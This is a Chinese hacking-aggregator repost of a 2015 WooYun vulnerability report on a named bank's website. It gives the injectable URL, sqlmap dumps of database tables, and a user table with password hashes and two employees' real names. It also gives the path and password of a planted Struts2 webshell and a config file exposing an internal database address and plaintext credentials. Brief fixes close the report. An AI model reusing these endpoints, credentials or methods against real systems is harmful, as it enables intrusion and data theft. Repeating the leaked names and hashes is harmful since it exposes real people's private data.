记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某银行SQL注入/struts2漏洞

2015-02-24 21:40

1.注入漏洞

http://www.cccb.cn/front/main.action?des=10&method=view&tranCode=240002&tranType=ajax

2.jpg



available databases [7]:

[*] CTXSYS

[*] EP2WEBSITE

[*] EXFSYS

[*] MDSYS

[*] OLAPSYS

[*] SYS

[*] SYSTEM

web application technology: Servlet 2.5, JSP 2.1

back-end DBMS: Oracle

Database: EP2WEBSITE

+------------------+---------+

| Table | Entries |

+------------------+---------+

| PUBVISITDAYLIST | 22951 |

| PUBTRANSLOG | 21114 |

| ARTNEWSINFO | 1667 |

| PUBVISITCOUNT | 1431 |

| VOTBOOK | 145 |

| MGZPIC | 77 |

| ARTCOLUMNINFO | 61 |

| PUBPARAM | 57 |

| CONINFO | 52 |

| PUBMENUINFO | 45 |

| MGZINFO | 21 |

| RECWORKRECORD | 17 |

| CYCMENUINFO | 12 |

| CONLINKMAN | 10 |

| RECEDUCATION | 10 |

| RECAPPLICANTINFO | 8 |

| VOTOPT | 6 |

| CONCLASS | 5 |

| RECFAMILY | 4 |

| USERGROUPINFO | 3 |

| USERINFO | 3 |

| CYCUSERINFO | 2 |

| ORGINFO | 2 |

| RECAWARDSINFO | 2 |

| CYCCONSOLE | 1 |

| PUBNOTICE | 1 |

| RECPOSITION | 1 |

| VOTINFO | 1 |

+------------------+---------+

Database: EP2WEBSITE

Table: USERINFO

[3 entries]

+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+

| GID | ORG | FLAG | STATUS | PASSWD | USERCODE | USERNAME | USERPOST | PASSERROR | USERLEVEL | BASEGROUP | LASTLOGINTIME | CURRENTLOGINTIME |

+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+

| 1 | 999999 | 00000000 | 0 | B4BA5283CC2B64521DAFB8248B639882 | admin | admin | NULL | 0 | 00 | 00 | 2015-01-08 10:38:18 | 2015-01-08 10:43:30 |

| 384 | 999999 | 1000000000000000 | 0 | BDE0CE38440C224D5C10497AD365EAE0 | 800433 | 任玉菲 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:00 |

| 385 | 999999 | 1000000000000000 | 0 | 6D222AADB13C8516C2079486771776EA | 801365 | 吴迪 | NULL | 0 | 01 | 01 | NULL | 2014-12-25 09:10:26 |

+-----+--------+------------------+--------+----------------------------------+----------+----------+----------+-----------+-----------+-----------+---------------------+---------------------+



web application technology: Servlet 2.5, JSP 2.1

back-end DBMS: Oracle

Database: EP2WEBSITE

Table: CONINFO

[52 entries]





2.xss



1.jpg





3.struts2

http://www.cccb.cn/front/main.action

3.jpg





http://www.cccb.cn/wooyun.jsp

密码wooyun

6.jpg



config.properties可以找到数据库密码

#database dev service configration

dbUrl=jdbc:oracle:thin:@31.23.36.109:1521:Ep2Web

dbUser=ep2website

dbPass=ep2website

dbSchema=EP2WEBSITE



user_encypt=yes

packagePreName=cn.cccb.appsource

servicePackage=cn.cccb.appsource.service

workunitPackage=cn.cccb.appsource.workunit.app

workapiPackage=cn.cccb.appsource.workunit.api

batchUnitPackage=cn.cccb.appsource.batch

defaultPassword=111111

uploadDir=/home/Ep2Web/uploads

certificatesPath=/home/Ep2Web/certificates</code>





4.任意文件下载



4.jpg



漏洞证明:

2.jpg



1.jpg



3.jpg



6.jpg



4.jpg

修复方案:

1.过滤特殊字符(注入xss类)

2.升级struts2框架

3.访问控制

知识来源: www.wooyun.org/bugs/wooyun-2015-090991

阅读:98084 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“某银行SQL注入/struts2漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云